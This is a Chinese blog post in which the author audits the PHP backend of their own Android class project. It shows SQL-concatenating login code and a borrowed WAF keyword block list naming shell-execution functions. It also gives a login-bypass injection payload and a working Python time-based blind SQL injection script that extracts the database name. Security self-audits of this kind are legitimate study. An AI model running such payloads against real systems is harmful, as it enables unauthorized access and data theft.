<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.ico?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.ico?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="web," />










<meta name="description" content="上学期期末安卓设计的简单后端的审计">
<meta property="og:type" content="article">
<meta property="og:title" content="一次安卓后端审计">
<meta property="og:url" content="https://lockcy.github.io/2019/09/26/%E4%B8%80%E6%AC%A1%E5%AE%89%E5%8D%93%E5%90%8E%E7%AB%AF%E5%AE%A1%E8%AE%A1/index.html">
<meta property="og:site_name" content="lockcy&#39;s cave">
<meta property="og:description" content="上学期期末安卓设计的简单后端的审计">
<meta property="og:locale">
<meta property="article:published_time" content="2019-09-26T01:15:05.000Z">
<meta property="article:modified_time" content="2019-09-28T11:25:46.083Z">
<meta property="article:author" content="lockcy">
<meta property="article:tag" content="web">
<meta name="twitter:card" content="summary">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"always","offset":12,"b2t":true,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://lockcy.github.io/2019/09/26/一次安卓后端审计/"/>





  <title>一次安卓后端审计 | lockcy's cave</title>
  








<meta name="generator" content="Hexo 5.4.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">lockcy's cave</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://lockcy.github.io/2019/09/26/%E4%B8%80%E6%AC%A1%E5%AE%89%E5%8D%93%E5%90%8E%E7%AB%AF%E5%AE%A1%E8%AE%A1/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/harutya.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="lockcy's cave">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">一次安卓后端审计</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-09-26T09:15:05+08:00">
                2019-09-26
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  732
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  3
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>上学期期末安卓设计的简单后端的审计</p>
<span id="more"></span>

<p>上学期期末安卓课程设计完成了安全辅助工具app，后端是用php写的，简单的实现了注册修改登录和一些命令执行的功能，对数据库的操作都是sql语句拼接的，虽然当时挂了网上找的防sql注入的waf并做了一些防命令注入的措施，但还是觉得不安全，想审计一下。</p>
<p>login.php关键代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">$username &#x3D; $_POST[&#39;username&#39;];</span><br><span class="line">$password &#x3D; $_POST[&#39;password&#39;];</span><br><span class="line">&#x2F;&#x2F;查询数据库</span><br><span class="line">$query &#x3D; &quot;select * from user where UserName&#x3D;&#39;$username&#39; and Password&#x3D;&#39;$password&#39;&quot;.&quot; limit 1&quot;;</span><br><span class="line">$data1 &#x3D; mysqli_query($conn, $query);</span><br><span class="line"></span><br><span class="line">$row &#x3D; mysqli_num_rows($data1);&#x2F;&#x2F;返回的行数</span><br><span class="line">$data &#x3D; array();</span><br><span class="line">if($row &gt; 0)&#123;</span><br><span class="line">    $data[&quot;code&quot;] &#x3D; 1;</span><br><span class="line">    $data[&#39;message&#39;] &#x3D; &quot;登录成功&quot;;</span><br><span class="line">&#125;else&#123;</span><br><span class="line">    $data[&quot;code&quot;] &#x3D; 0;</span><br><span class="line">    $data[&#39;message&#39;] &#x3D; &quot;登录失败&quot;;</span><br><span class="line">&#125;</span><br><span class="line">echo json_encode($data,JSON_UNESCAPED_UNICODE);</span><br><span class="line">&#x2F;&#x2F;关闭数据库</span><br><span class="line">mysqli_close($conn);</span><br></pre></td></tr></table></figure>
<p>没有任何防护，但在auto_prepend_file里加了网上找的waf<br>waf关键代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">      $pattern &#x3D; &quot;select|insert|update|delete|and|or|\&#39;|\&#x2F;\*|\*|\.\.\&#x2F;|\.\&#x2F;|union|into|load_file|outfile|dumpfile|sub|hex&quot;;</span><br><span class="line">      $pattern .&#x3D; &quot;|file_put_contents|fwrite|curl|system|eval|assert&quot;;</span><br><span class="line">      $pattern .&#x3D;&quot;|passthru|exec|system|chroot|scandir|chgrp|chown|shell_exec|proc_open|proc_get_status|popen|ini_alter|ini_restore&quot;;</span><br><span class="line">      $pattern .&#x3D;&quot;|&#96;|dl|openlog|syslog|readlink|symlink|popepassthru|stream_socket_server|assert|pcntl_exec&quot;;</span><br><span class="line">      $vpattern &#x3D; explode(&quot;|&quot;,$pattern);</span><br><span class="line">      $bool &#x3D; false;</span><br><span class="line">      foreach ($input as $k &#x3D;&gt; $v) &#123;</span><br><span class="line">          foreach($vpattern as $value)&#123;</span><br><span class="line">              foreach ($v as $kk &#x3D;&gt; $vv) &#123;</span><br><span class="line">                  if (preg_match( &quot;&#x2F;$value&#x2F;i&quot;, $vv ))&#123;</span><br><span class="line">                      $bool &#x3D; true;</span><br><span class="line">                      logging($input);</span><br><span class="line">                      break;</span><br><span class="line">                  &#125;</span><br><span class="line">              &#125;</span><br><span class="line">              if($bool) break;</span><br><span class="line">          &#125;</span><br><span class="line">          if($bool) break;</span><br><span class="line">      &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  function logging($var)&#123;</span><br><span class="line">&#x2F;&#x2F;echo LOG_FILENAME;</span><br><span class="line">echo &quot;含有非法字符串&quot;;</span><br><span class="line">      file_put_contents(LOG_FILENAME, &quot;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&quot;.&quot;\r\n&quot;.date(&quot;Y-m-d H:i:s&quot;).&quot;\r\n&quot;.print_r($var, true), FILE_APPEND);</span><br><span class="line">die();</span><br><span class="line">     # die() or unset($_GET) or unset($_POST) or unset($_COOKIE);</span><br><span class="line">  &#125;</span><br><span class="line">  waf();</span><br></pre></td></tr></table></figure>
<p>过滤了很多关键字和引号，但没有过滤\，发现了一个sql注入导致的万能登录<br>username=1&amp;password=|| (1=1) #<br>既然有了注入点就继续研究下，发现可以在绕过waf的情况下进行盲注</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">#!&#x2F;usr&#x2F;bin&#x2F;env python3</span><br><span class="line"># -*- coding: UTF-8 -*-</span><br><span class="line"></span><br><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line">r&#x3D;requests.session()</span><br><span class="line">url&#x3D;&#39;http:&#x2F;&#x2F;xxx.xxx.xxx.xxx&#x2F;login.php&#39;</span><br><span class="line">result &#x3D; &#39;&#39;</span><br><span class="line">for i in range(1,8):</span><br><span class="line">    for j in range(37,128):</span><br><span class="line">        time1&#x3D;time.time()</span><br><span class="line">        username &#x3D; &quot;username&#x3D;1\\&quot;</span><br><span class="line">        password&#x3D;&quot;|| (1&#x3D;1) &amp;&amp; if(mid(database(),&#123;0&#125;,1)&#x3D;&#123;1&#125;,sleep(1),0);#&quot;.format(str(i),str(hex(j)))</span><br><span class="line">        print (username+&#39;&amp;&#39;+password)</span><br><span class="line">        data &#x3D; &#123;&quot;username&quot;:username,&quot;password&quot;:password&#125;</span><br><span class="line">        html &#x3D; r.post(url,data&#x3D;data,timeout&#x3D;10)</span><br><span class="line">        time2&#x3D;time.time()</span><br><span class="line">        if time2-time1&gt;2 :</span><br><span class="line">            result +&#x3D; chr(j)</span><br><span class="line">            print (result)</span><br><span class="line">            break</span><br><span class="line">print (result)</span><br></pre></td></tr></table></figure>
<p>爆出数据库名testdb<br>但这里过滤了单引号，也没有其他可以直接执行sql语句的地方，没办法写马</p>
<p>另外一处可能存在命令注入的地方绕不过ip正则……</p>

      
    </div>
    
    
    
<div>
      
        

      
</div>

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/web/" rel="tag"># web</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/09/23/%E5%AE%89%E5%8D%93%E9%80%86%E5%90%91%E7%AC%94%E8%AE%B0%EF%BC%88%E4%B8%80%EF%BC%89/" rel="next" title="安卓逆向笔记（一）">
                <i class="fa fa-chevron-left"></i> 安卓逆向笔记（一）
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/09/28/mysql%E7%AA%81%E7%A0%B4secure-file-priv%E5%86%99shell/" rel="prev" title="mysql突破secure_file_priv写shell">
                mysql突破secure_file_priv写shell <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">


		<!--<div id="music163player">
			<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=450 src="//music.163.com/outchain/player?type=0&id=2196816455&auto=1&height=430"></iframe>
		</div>-->

      

      

      <section class="site-overview-wrap sidebar-panel sidebar-panel-active">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/harutya.jpg"
                alt="" />
            
              <p class="site-author-name" itemprop="name"></p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/%7C%7C%20archive">
              
                  <span class="site-state-item-count">45</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">12</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/lockcy" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:lockcysec@qq.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
            </div>
          

          <link rel="stylesheet" href="/dist/APlayer.min.css">
          <div id="aplayer"></div>
          <script type="text/javascript" src="/dist/APlayer.min.js"></script>
          <script type="text/javascript" src="/dist/music.js"></script>
      
          
          


          
          


          

        </div>
      </section>

      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
            <span id="scrollpercent"><span>0</span>%</span>
          
        </div>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">lockcy</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">38.5k</span>
  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.4</div>




<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<span id="busuanzi_container_site_pv">本站总访问量<span id="busuanzi_value_site_pv"></span>次</span>
<span class="post-meta-divider">|</span>
<span id="busuanzi_container_site_uv">本站访客数<span id="busuanzi_value_site_uv"</span>人</span>



        







        
      </div>
    </footer>

    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
<script src="/live2d-widget/autoload.js"></script>
